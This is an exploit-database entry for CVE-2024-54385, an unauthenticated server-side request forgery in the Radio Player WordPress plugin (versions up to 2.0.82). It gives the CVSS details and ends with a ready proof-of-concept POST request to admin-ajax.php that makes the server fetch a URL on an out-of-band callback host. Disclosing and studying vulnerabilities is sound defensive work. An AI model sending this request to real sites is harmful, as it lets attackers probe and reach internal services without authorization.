Share
## https://sploitus.com/exploit?id=1337DAY-ID-39848
# CVE-2024-54385
Radio Player <= 2.0.82 - Unauthenticated Server-Side Request Forgery

# Description

The Radio Player โ€“ Live Shoutcast, Icecast and Any Audio Stream Player for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.0.82. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.

## Details

- **Type**: plugin
- **Slug**: radio-player
- **Affected Version**: 2.0.82
- **CVSS Score**: 7.2
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
- **CVE**: CVE-2024-54385
- **Status**: Active

POC
---
```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8
```